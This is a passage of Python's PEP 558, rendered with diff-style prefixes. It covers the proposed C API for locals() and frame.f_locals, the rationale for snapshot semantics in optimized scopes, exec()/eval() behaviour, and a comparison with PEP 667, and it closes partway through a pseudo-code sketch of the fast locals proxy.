Note: calling the proxy.clear() method has a similarly broad impact as +calling PyFrame_LocalsToFast() on an empty frame value cache in earlier +versions. Not only will the frame local variables be cleared, but also any cell +variables accessible from the frame (whether those cells are owned by the +frame itself or by an outer frame). This can clear a class’s __class__ +cell if called on the frame of a method that uses the zero-arg super() +construct (or otherwise references __class__). This exceeds the scope of +calling frame.clear(), as that only drop’s the frame’s references to cell +variables, it doesn’t clear the cells themselves. This PEP could be a potential +opportunity to narrow the scope of attempts to clear the frame variables +directly by leaving cells belonging to outer frames alone, and only clearing +local variables and cells belonging directly to the frame underlying the proxy +(this issue affects PEP 667 as well, as the question relates to the handling of +cell variables, and is entirely independent of the internal frame value cache).

+
+
+

Changes to the stable C API/ABI

+

Unlike Python code, extension module functions that call in to the Python C API +can be called from any kind of Python scope. This means it isn’t obvious from +the context whether locals() will return a snapshot or not, as it depends +on the scope of the calling Python code, not the C code itself.

+

This means it is desirable to offer C APIs that give predictable, scope +independent, behaviour. However, it is also desirable to allow C code to +exactly mimic the behaviour of Python code at the same scope.

+

To enable mimicking the behaviour of Python code, the stable C ABI would gain +the following new functions:

+
PyObject * PyLocals_Get();
+PyLocals_Kind PyLocals_GetKind();
+
+
+

PyLocals_Get() is directly equivalent to the Python locals() builtin. +It returns a new reference to the local namespace mapping for the active +Python frame at module and class scope, and when using exec() or eval(). +It returns a shallow copy of the active namespace at +function/coroutine/generator scope.

+

PyLocals_GetKind() returns a value from the newly defined PyLocals_Kind +enum, with the following options being available:

+
    +
  • PyLocals_DIRECT_REFERENCE: PyLocals_Get() returns a direct reference +to the local namespace for the running frame.
  • +
  • PyLocals_SHALLOW_COPY: PyLocals_Get() returns a shallow copy of the +local namespace for the running frame.
  • +
  • PyLocals_UNDEFINED: an error occurred (e.g. no active Python thread +state). A Python exception will be set if this value is returned.
  • +
+

Since the enum is used in the stable ABI, an additional 31-bit value is set to +ensure that it is safe to cast arbitrary signed 32-bit signed integers to +PyLocals_Kind values.

+

This query API allows extension module code to determine the potential impact +of mutating the mapping returned by PyLocals_Get() without needing access +to the details of the running frame object. Python code gets equivalent +information visually through lexical scoping (as covered in the new locals() +builtin documentation).

+

To allow extension module code to behave consistently regardless of the active +Python scope, the stable C ABI would gain the following new function:

+
PyObject * PyLocals_GetCopy();
+
+
+

PyLocals_GetCopy() returns a new dict instance populated from the current +locals namespace. Roughly equivalent to dict(locals()) in Python code, but +avoids the double-copy in the case where locals() already returns a shallow +copy. Akin to the following code, but doesn’t assume there will only ever be +two kinds of locals result:

+
locals = PyLocals_Get();
+if (PyLocals_GetKind() == PyLocals_DIRECT_REFERENCE) {
+    locals = PyDict_Copy(locals);
+}
+
+
+

The existing PyEval_GetLocals() API will retain its existing behaviour in +CPython (mutable locals at class and module scope, shared dynamic snapshot +otherwise). However, its documentation will be updated to note that the +conditions under which the shared dynamic snapshot get updated have changed.

+

The PyEval_GetLocals() documentation will also be updated to recommend +replacing usage of this API with whichever of the new APIs is most appropriate +for the use case:

+
    +
  • Use PyLocals_Get() (optionally combined with PyDictProxy_New()) for +read-only access to the current locals namespace. This form of usage will +need to be aware that the copy may go stale in optimised frames.
  • +
  • Use PyLocals_GetCopy() for a regular mutable dict that contains a copy of +the current locals namespace, but has no ongoing connection to the active +frame.
  • +
  • Use PyLocals_Get() to exactly match the semantics of the Python level +locals() builtin.
  • +
  • Query PyLocals_GetKind() explicitly to implement custom handling +(e.g. raising a meaningful exception) for scopes where PyLocals_Get() +would return a shallow copy rather than granting read/write access to the +locals namespace.
  • +
  • Use implementation specific APIs (e.g. PyObject_GetAttrString(frame, "f_locals")) +if read/write access to the frame is required and PyLocals_GetKind() +returns something other than PyLocals_DIRECT_REFERENCE.
  • +
+
+
+

Changes to the public CPython C API

+

The existing PyEval_GetLocals() API returns a borrowed reference, which +means it cannot be updated to return the new shallow copies at function +scope. Instead, it will continue to return a borrowed reference to an internal +dynamic snapshot stored on the frame object. This shared mapping will behave +similarly to the existing shared mapping in Python 3.10 and earlier, but the exact +conditions under which it gets refreshed will be different. Specifically, it +will be updated only in the following circumstance:

+
    +
  • any call to PyEval_GetLocals(), PyLocals_Get(), PyLocals_GetCopy(), +or the Python locals() builtin while the frame is running
  • +
  • any call to PyFrame_GetLocals(), PyFrame_GetLocalsCopy(), +_PyFrame_BorrowLocals(), PyFrame_FastToLocals(), or +PyFrame_FastToLocalsWithError() for the frame
  • +
  • any operation on a fast locals proxy object that updates the shared +mapping as part of its implementation. In the initial reference +implementation, those operations are those that are intrinsically O(n) +operations (len(flp), mapping comparison, flp.copy() and rendering as +a string), as well as those that refresh the cache entries for individual keys.
  • +
+

Requesting a fast locals proxy will not implicitly update the shared dynamic +snapshot, and the CPython trace hook handling will no longer implicitly update +it either.

+

(Note: even though PyEval_GetLocals() is part of the stable C API/ABI, the +specifics of when the namespace it returns gets refreshed are still an +interpreter implementation detail)

+

The additions to the public CPython C API are the frame level enhancements +needed to support the stable C API/ABI updates:

+
PyLocals_Kind PyFrame_GetLocalsKind(frame);
+PyObject * PyFrame_GetLocals(frame);
+PyObject * PyFrame_GetLocalsCopy(frame);
+PyObject * _PyFrame_BorrowLocals(frame);
+
+
+

PyFrame_GetLocalsKind(frame) is the underlying API for +PyLocals_GetKind().

+

PyFrame_GetLocals(frame) is the underlying API for PyLocals_Get().

+

PyFrame_GetLocalsCopy(frame) is the underlying API for +PyLocals_GetCopy().

+

_PyFrame_BorrowLocals(frame) is the underlying API for +PyEval_GetLocals(). The underscore prefix is intended to discourage use and +to indicate that code using it is unlikely to be portable across +implementations. However, it is documented and visible to the linker in order +to avoid having to access the internals of the frame struct from the +PyEval_GetLocals() implementation.

+

The PyFrame_LocalsToFast() function will be changed to always emit +RuntimeError, explaining that it is no longer a supported operation, and +affected code should be updated to use +PyObject_GetAttrString(frame, "f_locals") to obtain a read/write proxy +instead.

+

In addition to the above documented interfaces, the draft reference +implementation also exposes the following undocumented interfaces:

+
PyTypeObject _PyFastLocalsProxy_Type;
+#define _PyFastLocalsProxy_CheckExact(self) Py_IS_TYPE(op, &_PyFastLocalsProxy_Type)
+
+
+

This type is what the reference implementation actually returns from +PyObject_GetAttrString(frame, "f_locals") for optimized frames (i.e. +when PyFrame_GetLocalsKind() returns PyLocals_SHALLOW_COPY).

+
+
+

Reducing the runtime overhead of trace hooks

+

As noted in [9], the implicit call to PyFrame_FastToLocals() in the +Python trace hook support isn’t free, and could be rendered unnecessary if +the frame proxy read values directly from the frame instead of getting them +from the mapping.

+

As the new frame locals proxy type doesn’t require separate data refresh steps, +this PEP incorporates Victor Stinner’s proposal to no longer implicitly call +PyFrame_FastToLocalsWithError() before calling trace hooks implemented in +Python.

+

Code using the new fast locals proxy objects will have the dynamic locals snapshot +implicitly refreshed when accessing methods that need it, while code using the +PyEval_GetLocals() API will implicitly refresh it when making that call.

+

The PEP necessarily also drops the implicit call to PyFrame_LocalsToFast() +when returning from a trace hook, as that API now always raises an exception.

+
+
+
+

Rationale and Design Discussion

+
+

Changing locals() to return independent snapshots at function scope

+

The locals() builtin is a required part of the language, and in the +reference implementation it has historically returned a mutable mapping with +the following characteristics:

+
    +
  • each call to locals() returns the same mapping object
  • +
  • for namespaces where locals() returns a reference to something other than +the actual local execution namespace, each call to locals() updates the +mapping object with the current state of the local variables and any referenced +nonlocal cells
  • +
  • changes to the returned mapping usually aren’t written back to the +local variable bindings or the nonlocal cell references, but write backs +can be triggered by doing one of the following:
      +
    • installing a Python level trace hook (write backs then happen whenever +the trace hook is called)
    • +
    • running a function level wildcard import (requires bytecode injection in Py3)
    • +
    • running an exec statement in the function’s scope (Py2 only, since +exec became an ordinary builtin in Python 3)
    • +
    +
  • +
+

Originally this PEP proposed to retain the first two of these properties, +while changing the third in order to address the outright behaviour bugs that +it can cause.

+

In [7] Nathaniel Smith made a persuasive case that we could make the behaviour +of locals() at function scope substantially less confusing by retaining only +the second property and having each call to locals() at function scope +return an independent snapshot of the local variables and closure references +rather than updating an implicitly shared snapshot.

+

As this revised design also made the implementation markedly easier to follow, +the PEP was updated to propose this change in behaviour, rather than retaining +the historical shared snapshot.

+
+
+

Keeping locals() as a snapshot at function scope

+

As discussed in [7], it would theoretically be possible to change the semantics +of the locals() builtin to return the write-through proxy at function scope, +rather than switching it to return independent snapshots.

+

This PEP doesn’t (and won’t) propose this as it’s a backwards incompatible +change in practice, even though code that relies on the current behaviour is +technically operating in an undefined area of the language specification.

+

Consider the following code snippet:

+
def example():
+    x = 1
+    locals()["x"] = 2
+    print(x)
+
+
+

Even with a trace hook installed, that function will consistently print 1 +on the current reference interpreter implementation:

+
>>> example()
+1
+>>> import sys
+>>> def basic_hook(*args):
+...     return basic_hook
+...
+>>> sys.settrace(basic_hook)
+>>> example()
+1
+
+
+

Similarly, locals() can be passed to the exec() and eval() builtins +at function scope (either explicitly or implicitly) without risking unexpected +rebinding of local variables or closure references.

+

Provoking the reference interpreter into incorrectly mutating the local variable +state requires a more complex setup where a nested function closes over a +variable being rebound in the outer function, and due to the use of either +threads, generators, or coroutines, it’s possible for a trace function to start +running for the nested function before the rebinding operation in the outer +function, but finish running after the rebinding operation has taken place (in +which case the rebinding will be reverted, which is the bug reported in [1]).

+

In addition to preserving the de facto semantics which have been in place since +PEP 227 introduced nested scopes in Python 2.1, the other benefit of restricting +the write-through proxy support to the implementation-defined frame object API +is that it means that only interpreter implementations which emulate the full +frame API need to offer the write-through capability at all, and that +JIT-compiled implementations only need to enable it when a frame introspection +API is invoked, or a trace hook is installed, not whenever locals() is +accessed at function scope.

+

Returning snapshots from locals() at function scope also means that static +analysis for function level code will be more reliable, as only access to the +frame machinery will allow rebinding of local and nonlocal variable +references in a way that is hidden from static analysis.

+
+
+

What happens with the default args for eval() and exec()?

+

These are formally defined as inheriting globals() and locals() from +the calling scope by default.

+

There isn’t any need for the PEP to change these defaults, so it doesn’t, and +exec() and eval() will start running in a shallow copy of the local +namespace when that is what locals() returns.

+

This behaviour will have potential performance implications, especially +for functions with large numbers of local variables (e.g. if these functions +are called in a loop, calling globals() and locals() once before the +loop and then passing the namespace into the function explicitly will give the +same semantics and performance characteristics as the status quo, whereas +relying on the implicit default would create a new shallow copy of the local +namespace on each iteration).

+

(Note: the reference implementation draft PR has updated the locals() and +vars(), eval(), and exec() builtins to use PyLocals_Get(). The +dir() builtin still uses PyEval_GetLocals(), since it’s only using it +to make a list from the keys).

+
+
+

Additional considerations for eval() and exec() in optimized scopes

+

Note: while implementing PEP 667, it was noted that neither that PEP nor this one +clearly explained the impact the locals() changes would have on code execution APIs +like exec() and eval(). This section was added to this PEP’s rationale to better +describe the impact and explain the intended benefits of the change.

+

When exec() was converted from a statement to a builtin function +in Python 3.0 (part of the core language changes in PEP 3100), the +associated implicit call to PyFrame_LocalsToFast() was removed, so +it typically appears as if attempts to write to local variables with +exec() in optimized frames are ignored:

+
>>> def f():
+...     x = 0
+...     exec("x = 1")
+...     print(x)
+...     print(locals()["x"])
+...
+>>> f()
+0
+0
+
+
+

In truth, the writes aren’t being ignored, they just aren’t +being copied from the dictionary cache back to the optimized local +variable array. The changes to the dictionary are then overwritten +the next time the dictionary cache is refreshed from the array:

+
>>> def f():
+...     x = 0
+...     locals_cache = locals()
+...     exec("x = 1")
+...     print(x)
+...     print(locals_cache["x"])
+...     print(locals()["x"])
+...
+>>> f()
+0
+1
+0
+
+
+

The behaviour becomes even stranger if a tracing function +or another piece of code invokes PyFrame_LocalsToFast() before +the cache is next refreshed. In those cases the change is +written back to the optimized local variable array:

+
>>> from sys import _getframe
+>>> from ctypes import pythonapi, py_object, c_int
+>>> _locals_to_fast = pythonapi.PyFrame_LocalsToFast
+>>> _locals_to_fast.argtypes = [py_object, c_int]
+>>> def f():
+...     _frame = _getframe()
+...     _f_locals = _frame.f_locals
+...     x = 0
+...     exec("x = 1")
+...     _locals_to_fast(_frame, 0)
+...     print(x)
+...     print(locals()["x"])
+...     print(_f_locals["x"])
+...
+>>> f()
+1
+1
+1
+
+
+

This situation was more common in Python 3.10 and earlier +versions, as merely installing a tracing function was enough +to trigger implicit calls to PyFrame_LocalsToFast() after +every line of Python code. However, it can still happen in Python +3.11+ depending on exactly which tracing functions are active +(e.g. interactive debuggers intentionally do this so that changes +made at the debugging prompt are visible when code execution +resumes).

+

All of the above comments in relation to exec() apply to +any attempt to mutate the result of locals() in optimized +scopes, and are the main reason that the locals() builtin +docs contain this caveat:

+
+
Note: The contents of this dictionary should not be modified; +changes may not affect the values of local and free variables +used by the interpreter.
+

While the exact wording in the library reference is not entirely explicit, +both exec() and eval() have long used the results of calling +globals() and locals() in the calling Python frame as their default +execution namespace.

+

This was historically also equivalent to using the calling frame’s +frame.f_globals and frame.f_locals attributes, but this PEP maps +the default namespace arguments for exec() and eval() to +globals() and locals() in the calling frame in order to preserve +the property of defaulting to ignoring attempted writes to the local +namespace in optimized scopes.

+

This poses a potential compatibility issue for some code, as with the +previous implementation that returns the same dict when locals() is called +multiple times in function scope, the following code usually worked due to +the implicitly shared local variable namespace:

+
def f():
+    exec('a = 0')  # equivalent to exec('a = 0', globals(), locals())
+    exec('print(a)')  # equivalent to exec('print(a)', globals(), locals())
+    print(locals())  # {'a': 0}
+    # However, print(a) will not work here
+f()
+
+
+

With locals() in an optimised scope returning the same shared dict for each call, +it was possible to store extra “fake locals” in that dict. While these aren’t real +locals known by the compiler (so they can’t be printed with code like print(a)), +they can still be accessed via locals() and shared between multiple exec() +calls in the same function scope. Furthermore, because they’re not real locals, +they don’t get implicitly updated or removed when the shared cache is refreshed +from the local variable storage array.

+

When the code in exec() tries to write to an existing local variable, the +runtime behaviour gets harder to predict:

+
def f():
+    a = None
+    exec('a = 0')  # equivalent to exec('a = 0', globals(), locals())
+    exec('print(a)')  # equivalent to exec('print(a)', globals(), locals())
+    print(locals())  # {'a': None}
+f()
+
+
+

print(a) will print None because the implicit locals() call in +exec() refreshes the cached dict with the actual values on the frame. +This means that, unlike the “fake” locals created by writing back to locals() +(including via previous calls to exec()), the real locals known by the +compiler can’t easily be modified by exec() (it can be done, but it requires +both retrieving the frame.f_locals attribute to enable writes back to the frame, +and then invoking PyFrame_LocalsToFast(), as shown +using ctypes above).

+

As noted in the Motivation section, this confusing side effect +happens even if the local variable is only defined after the exec() calls:

+
>>> def f():
+...     exec("a = 0")
+...     exec("print('a' in locals())") # Printing 'a' directly won't work
+...     print(locals())
+...     a = None
+...     print(locals())
+...
+>>> f()
+False
+{}
+{'a': None}
+
+
+

Because a is a real local variable that is not currently bound to a value, it +gets explicitly removed from the dictionary returned by locals() whenever +locals() is called prior to the a = None line. This removal is intentional, +as it allows the contents of locals() to be updated correctly in optimized +scopes when del statements are used to delete previously bound local variables.

+

As noted in the ctypes example, the above behavioural +description may be invalidated if the CPython PyFrame_LocalsToFast() API gets invoked +while the frame is still running. In that case, the changes to a might become visible +to the running code, depending on exactly when that API is called (and whether the frame +has been primed for locals modification by accessing the frame.f_locals attribute).

+

As described above, two options were considered to replace this confusing behaviour:

+
    +
  • make locals() return write-through proxy instances (similar +to frame.f_locals)
  • +
  • make locals() return genuinely independent snapshots so that +attempts to change the values of local variables via exec() +would be consistently ignored without any of the caveats +noted above.
  • +
+

The PEP chooses the second option for the following reasons:

+
    +
  • returning independent snapshots in optimized scopes preserves +the Python 3.0 change to exec() that resulted in attempts +to mutate local variables via exec() being ignored in most +cases
  • +
  • the distinction between “locals() gives an instantaneous +snapshot of the local variables in optimized scopes, and +read/write access in other scopes” and “frame.f_locals +gives read/write access to the local variables in all scopes, +including optimized scopes” allows the intent of a piece of +code to be clearer than it would be if both APIs granted +full read/write access in optimized scopes, even when write +access wasn’t needed or desired
  • +
  • in addition to improving clarity for human readers, ensuring +that name rebinding in optimized scopes remains lexically +visible in the code (as long as the frame introspection APIs +are not accessed) allows compilers and interpreters to apply +related performance optimizations more consistently
  • +
  • only Python implementations that support the optional frame +introspection APIs will need to provide the new write-through +proxy support for optimized frames
  • +
+

With the semantic changes to locals() in this PEP, it becomes much easier to explain +the behavior of exec() and eval(): in optimized scopes, they will never implicitly +affect local variables; in other scopes, they will always implicitly affect local +variables. In optimized scopes, any implicit assignment to the local variables will be +discarded when the code execution API returns, since a fresh copy of the local variables +is used on each invocation.

+
+
+

Retaining the internal frame value cache

+

Retaining the internal frame value cache results in some visible quirks when +frame proxy instances are kept around and re-used after name binding and +unbinding operations have been executed on the frame.

+

The primary reason for retaining the frame value cache is to maintain backwards +compatibility with the PyEval_GetLocals() API. That API returns a borrowed +reference, so it must refer to persistent state stored on the frame object. +Storing a fast locals proxy object on the frame creates a problematic reference +cycle, so the cleanest option is to instead continue to return a frame value +cache, just as this function has done since optimised frames were first +introduced.

+

With the frame value cache being kept around anyway, it then further made sense +to rely on it to simplify the fast locals proxy mapping implementation.

+

Note: the fact PEP 667 doesn’t use the internal frame value cache as part of the +write-through proxy implementation is the key Python level difference between the two PEPs.

+
+
+

Changing the frame API semantics in regular operation

+

Note: when this PEP was first written, it predated the Python 3.11 change to drop the +implicit writeback of the frame local variables whenever a tracing function was installed, +so making that change was included as part of the proposal.

+

Earlier versions of this PEP proposed having the semantics of the frame +f_locals attribute depend on whether or not a tracing hook was currently +installed - only providing the write-through proxy behaviour when a tracing hook +was active, and otherwise behaving the same as the historical locals() +builtin.

+

That was adopted as the original design proposal for a couple of key reasons, +one pragmatic and one more philosophical:

+
    +
  • Object allocations and method wrappers aren’t free, and tracing functions +aren’t the only operations that access frame locals from outside the function. +Restricting the changes to tracing mode meant that the additional memory and +execution time overhead of these changes would be as close to zero in regular +operation as we can possibly make them.
  • +
  • “Don’t change what isn’t broken”: the current tracing mode problems are caused +by a requirement that’s specific to tracing mode (support for external +rebinding of function local variable references), so it made sense to also +restrict any related fixes to tracing mode
  • +
+

However, actually attempting to implement and document that dynamic approach +highlighted the fact that it makes for a really subtle runtime state dependent +behaviour distinction in how frame.f_locals works, and creates several +new edge cases around how f_locals behaves as trace functions are added +and removed.

+

Accordingly, the design was switched to the current one, where +frame.f_locals is always a write-through proxy, and locals() is always +a snapshot, which is both simpler to implement and easier to explain.

+

Regardless of how the CPython reference implementation chooses to handle this, +optimising compilers and interpreters also remain free to impose additional +restrictions on debuggers, such as making local variable mutation through frame +objects an opt-in behaviour that may disable some optimisations (just as the +emulation of CPython’s frame API is already an opt-in flag in some Python +implementations).

+
+
+

Continuing to support storing additional data on optimised frames

+

One of the draft iterations of this PEP proposed removing the ability to store +additional data on optimised frames by writing to frame.f_locals keys that +didn’t correspond to local or closure variable names on the underlying frame.

+

While this idea offered some attractive simplification of the fast locals proxy +implementation, pdb stores __return__ and __exception__ values on +arbitrary frames, so the standard library test suite fails if that functionality +no longer works.

+

Accordingly, the ability to store arbitrary keys was retained, at the expense +of certain operations on proxy objects being slower than could otherwise be +(since they can’t assume that only names defined on the code object will be +accessible through the proxy).

+

It is expected that the exact details of the interaction between the fast locals +proxy and the f_locals value cache on the underlying frame will evolve over +time as opportunities for improvement are identified.

+
+
+

Historical semantics at function scope

+

The current semantics of mutating locals() and frame.f_locals in CPython +are rather quirky due to historical implementation details:

+
    +
  • actual execution uses the fast locals array for local variable bindings and +cell references for nonlocal variables
  • +
  • there’s a PyFrame_FastToLocals operation that populates the frame’s +f_locals attribute based on the current state of the fast locals array +and any referenced cells. This exists for three reasons:
      +
    • allowing trace functions to read the state of local variables
    • +
    • allowing traceback processors to read the state of local variables
    • +
    • allowing locals() to read the state of local variables
    • +
    +
  • +
  • a direct reference to frame.f_locals is returned from locals(), so if +you hand out multiple concurrent references, then all those references will be +to the exact same dictionary
  • +
  • the two common calls to the reverse operation, PyFrame_LocalsToFast, were +removed in the migration to Python 3: exec is no longer a statement (and +hence can no longer affect function local namespaces), and the compiler now +disallows the use of from module import * operations at function scope
  • +
  • however, two obscure calling paths remain: PyFrame_LocalsToFast is called +as part of returning from a trace function (which allows debuggers to make +changes to the local variable state), and you can also still inject the +IMPORT_STAR opcode when creating a function directly from a code object +rather than via the compiler
  • +
+

This proposal deliberately doesn’t formalise these semantics as is, since they +only make sense in terms of the historical evolution of the language and the +reference implementation, rather than being deliberately designed.

+
+
+

Proposing several additions to the stable C API/ABI

+

Historically, the CPython C API (and subsequently, the stable ABI) has +exposed only a single API function related to the Python locals builtin: +PyEval_GetLocals(). However, as it returns a borrowed reference, it is +not possible to adapt that interface directly to supporting the new locals() +semantics proposed in this PEP.

+

An earlier iteration of this PEP proposed a minimalist adaptation to the new +semantics: one C API function that behaved like the Python locals() builtin, +and another that behaved like the frame.f_locals descriptor (creating and +returning the write-through proxy if necessary).

+

The feedback [8] on that version of the C API was that it was too heavily based +on how the Python level semantics were implemented, and didn’t account for the +behaviours that authors of C extensions were likely to need.

+

The broader API now being proposed came from grouping the potential reasons for +wanting to access the Python locals() namespace from an extension module +into the following cases:

+
    +
  • needing to exactly replicate the semantics of the Python level locals() +operation. This is the PyLocals_Get() API.
  • +
  • needing to behave differently depending on whether writes to the result of +PyLocals_Get() will be visible to Python code or not. This is handled by +the PyLocals_GetKind() query API.
  • +
  • always wanting a mutable namespace that has been pre-populated from the +current Python locals() namespace, but not wanting any changes to +be visible to Python code. This is the PyLocals_GetCopy() API.
  • +
  • always wanting a read-only view of the current locals namespace, without +incurring the runtime overhead of making a full copy each time. This isn’t +readily offered for optimised frames due to the need to check whether names +are currently bound or not, so no specific API is being added to cover it.
  • +
+

Historically, these kinds of checks and operations would only have been +possible if a Python implementation emulated the full CPython frame API. With +the proposed API, extension modules can instead ask more clearly for the +semantics that they actually need, giving Python implementations more +flexibility in how they provide those capabilities.

+
+
+

Comparison with PEP 667

+

NOTE: the comparison below is against PEP 667 as it was in December 2021. +It does not reflect the state of PEP 667 as of April 2024 (when this PEP was +withdrawn in favour of proceeding with PEP 667).

+

PEP 667 offers a partially competing proposal for this PEP that suggests it +would be reasonable to eliminate the internal frame value cache on optimised +frames entirely.

+

These changes were originally offered as amendments to PEP 558, and the PEP +author rejected them for three main reasons:

+
    +
  • the initial claim that PyEval_GetLocals() was unfixable because it returns +a borrowed reference was simply false, as it is still working in the PEP 558 +reference implementation. All that is required to keep it working is to +retain the internal frame value cache and design the fast locals proxy in +such a way that it is reasonably straightforward to keep the cache up to date +with changes in the frame state without incurring significant runtime overhead +when the cache isn’t needed. Given that this claim is false, the proposal to +require that all code using the PyEval_GetLocals() API be rewritten to use +a new API with different refcounting semantics fails PEP 387’s requirement +that API compatibility breaks should have a large benefit to breakage ratio +(since there’s no significant benefit gained from dropping the cache, no code +breakage can be justified). The only genuinely unfixable public API is +PyFrame_LocalsToFast() (which is why both PEPs propose breaking that).
  • +
  • without some form of internal value cache, the API performance characteristics +of the fast locals proxy mapping become quite unintuitive. len(proxy), for +example, becomes consistently O(n) in the number of variables defined on the +frame, as the proxy has to iterate over the entire fast locals array to see +which names are currently bound to values before it can determine the answer. +By contrast, maintaining an internal frame value cache potentially allows +proxies to largely be treated as normal dictionaries from an algorithmic +complexity point of view, with allowances only needing to be made for the +initial implicit O(n) cache refresh that runs the first time an operation +that relies on the cache being up to date is executed.
  • +
  • the claim that a cache-free implementation would be simpler is highly suspect, +as PEP 667 includes only a pure Python sketch of a subset of a mutable mapping +implementation, rather than a full-fledged C implementation of a new mapping +type integrated with the underlying data storage for optimised frames. +PEP 558’s fast locals proxy implementation delegates heavily to the +frame value cache for the operations needed to fully implement the mutable +mapping API, allowing it to re-use the existing dict implementations of the +following operations:
      +
    • __len__
    • +
    • __str__
    • +
    • __or__ (dict union)
    • +
    • __iter__ (allowing the dict_keyiterator type to be reused)
    • +
    • __reversed__ (allowing the dict_reversekeyiterator type to be reused)
    • +
    • keys() (allowing the dict_keys type to be reused)
    • +
    • values() (allowing the dict_values type to be reused)
    • +
    • items() (allowing the dict_items type to be reused)
    • +
    • copy()
    • +
    • popitem()
    • +
    • value comparison operations
    • +
    +
  • +
+

Of the three reasons, the first is the most important (since we need compelling +reasons to break API backwards compatibility, and we don’t have them).

+

However, after reviewing PEP 667’s proposed Python level semantics, the author +of this PEP eventually agreed that they would be simpler for users of the +Python locals() API, so this distinction between the two PEPs has been +eliminated: regardless of which PEP and implementation is accepted, the fast +locals proxy object always provides a consistent view of the current state +of the local variables, even if this results in some operations becoming O(n) +that would be O(1) on a regular dictionary (specifically, len(proxy) +becomes O(n), since it needs to check which names are currently bound, and proxy +mapping comparisons avoid relying on the length check optimisation that allows +differences in the number of stored keys to be detected quickly for regular +mappings).

+

Due to the adoption of these non-standard performance characteristics in the +proxy implementation, the PyLocals_GetView() and PyFrame_GetLocalsView() +C APIs were also removed from the proposal in this PEP.

+

This leaves the only remaining points of distinction between the two PEPs as +specifically related to the C API:

+
    +
  • PEP 667 still proposes completely unnecessary C API breakage (the programmatic +deprecation and eventual removal of PyEval_GetLocals(), +PyFrame_FastToLocalsWithError(), and PyFrame_FastToLocals()) without +justification, when it is entirely possible to keep these working indefinitely +(and interoperably) given a suitably designed fast locals proxy implementation
  • +
  • the fast locals proxy handling of additional variables is defined in this PEP +in a way that is fully interoperable with the existing PyEval_GetLocals() +API. In the proxy implementation proposed in PEP 667, users of the new frame +API will not see changes made to additional variables by users of the old API, +and changes made to additional variables via the old API will be overwritten +on subsequent calls to PyEval_GetLocals().
  • +
  • the PyLocals_Get() API in this PEP is called PyEval_Locals() in PEP 667. +This function name is a bit strange as it lacks a verb, making it look more +like a type name than a data access API.
  • +
  • this PEP adds PyLocals_GetCopy() and PyFrame_GetLocalsCopy() APIs to +allow extension modules to easily avoid incurring a double copy operation in +frames where PyLocals_Get() already makes a copy
  • +
  • this PEP adds PyLocals_Kind, PyLocals_GetKind(), and +PyFrame_GetLocalsKind() to allow extension modules to identify when code +is running at function scope without having to inspect non-portable frame and +code object APIs (without the proposed query API, the existing equivalent to +the new PyLocals_GetKind() == PyLocals_SHALLOW_COPY check is to include +the CPython internal frame API headers and check if +_PyFrame_GetCode(PyEval_GetFrame())->co_flags & CO_OPTIMIZED is set)
  • +
+

The Python pseudo-code below is based on the implementation sketch presented +in PEP 667 as of the time of writing (2021-10-24). The differences that +provide the improved interoperability between the new fast locals proxy API +and the existing PyEval_GetLocals() API are noted in comments.

+

As in PEP 667, all attributes that start with an underscore are invisible and +cannot be accessed directly. They serve only to illustrate the proposed design.

+

For simplicity (and as in PEP 667), the handling of module and class level +frames is omitted (they’re much simpler, as _locals is the execution +namespace, so no translation is required).

+
NULL: Object # NULL is a singleton representing the absence of a value.
+
+class CodeType:
+
+    _name_to_offset_mapping_impl: dict | NULL
+    ...
+
+    def __init__(self, ...):
+        self._name_to_offset_mapping_impl = NULL
+        self._variable_names = deduplicate(
+            self.co_varnames + self.co_cellvars + self.co_freevars
+        )
+        ...
+
+    def _is_cell(self, offset):
+        ... # How the interpreter identifies cells is an implementation detail
+
+    @property
+    def _name_to_offset_mapping(self):
+        "Mapping of names to offsets in local variable array."
+        if self._name_to_offset_mapping_impl is NULL:
+
+            self._name_to_offset_mapping_impl = {
+                name: index for (index, name) in enumerate(self._variable_names)
+            }
+        return self._name_to_offset_mapping_impl
+
+class FrameType:
+
+    _fast_locals : array[Object] # The values of the local variables, items may be NULL.
+    _locals: dict | NULL # Dictionary returned by PyEval_GetLocals()
+
+    def __init__(self, ...):
+        self._locals = NULL
+        ...
+
+    @property
+    def f_locals(self):
+        return FastLocalsProxy(self)
+
+class FastLocalsProxy:
+
+    __slots__ "_frame"
+
+    def __init__(self, frame:FrameType):
+        self._frame = frame
+
+    def _set_locals_entry(self, name, val):
+        f = self._frame
+        if f._locals is NULL:
+            f._locals = {}
+        f._locals[name] = val
+
+    def __getitem__(self, name):
+        f = self._frame
+        co = f.f_code
+        if name in co._name_to_offset_mapping:
+            index = co._name_to_offset_mapping[name]
+            val = f._fast_locals[index]
+            if val is NULL:
+                raise KeyError(name)
+            if co._is_cell(offset)
+                val = val.cell_contents
+                if val is NULL:
+                    raise KeyError(name)
+            # PyEval_GetLocals() interop: implicit frame cache refresh
+            self._set_locals_entry(name, val)
+            return val
+        # PyEval_GetLocals() interop: frame cache may contain additional names
+        if f._locals is NULL:
+            raise KeyError(name)
+        return f._locals[name]
+
+    def __setitem__(self, name, value):
+        f = self._frame
+        co = f.f_code
+        if name in co._name_to_offset_mapping:
+            index = co._name_to_offset_mapping[name]
+            kind = co._local_kinds[index]
+            if co._is_cell(offset)
+                cell = f._locals[index]
+                cell.cell_contents = val
+            else:
+                f._fast_locals[index] = val
+        # PyEval_GetLocals() interop: implicit frame cache update
+        # even for names that are part of the fast locals array
+        self._set_locals_entry(name, val)
+
+    def __delitem__(self, name):
+        f = self._frame
+        co = f.f_code
+        if name in co._name_to_offset_mapping:
+            index = co._name_to_offset_mapping[name]
+            kind = co._local_kinds[index]
+            if co._is_cell(offset)
+                cell = f._locals[index]
+                cell.cell_contents = NULL
+            else:
+                f._fast_locals[index] = NULL
+        # PyEval_GetLocals() interop: implicit frame cache update
+        # even for names that are part of the fast locals array
+        if f._locals is not NULL:
+            del f._locals[name]
+
+    def __iter__(self):
+        f = self._frame
+        co = f.f_code
+        for index, name in enumerate(co._variable_names):
+            val = f._fast_locals[index]
+            if val is NULL:
+                continue
+            if co._is_cell(offset):
+                val = val.cell_contents
+                if val is NULL:
+                    continue
+            yield name
+        for name in f._locals:
+            # Yield any extra names not defined on the frame
+            if name in co._name_to_offset_mapping:
+                continue
+            yield name
+
+    def popitem(self):
+        f = self._frame
+        co = f.f_code
+        for name in self:
+            val = self[name]
+        # PyEval_GetLocals() interop: implicit frame cache update
+        # even for names that are part of the fast locals array
+        del name
+        return name, val
+
+    def _sync_frame_cache(self):
+        # This method underpins PyEval_GetLocals, PyFrame_FastToLocals
+        # PyFrame_GetLocals, PyLocals_Get, mapping comparison, etc
+        f = self._frame
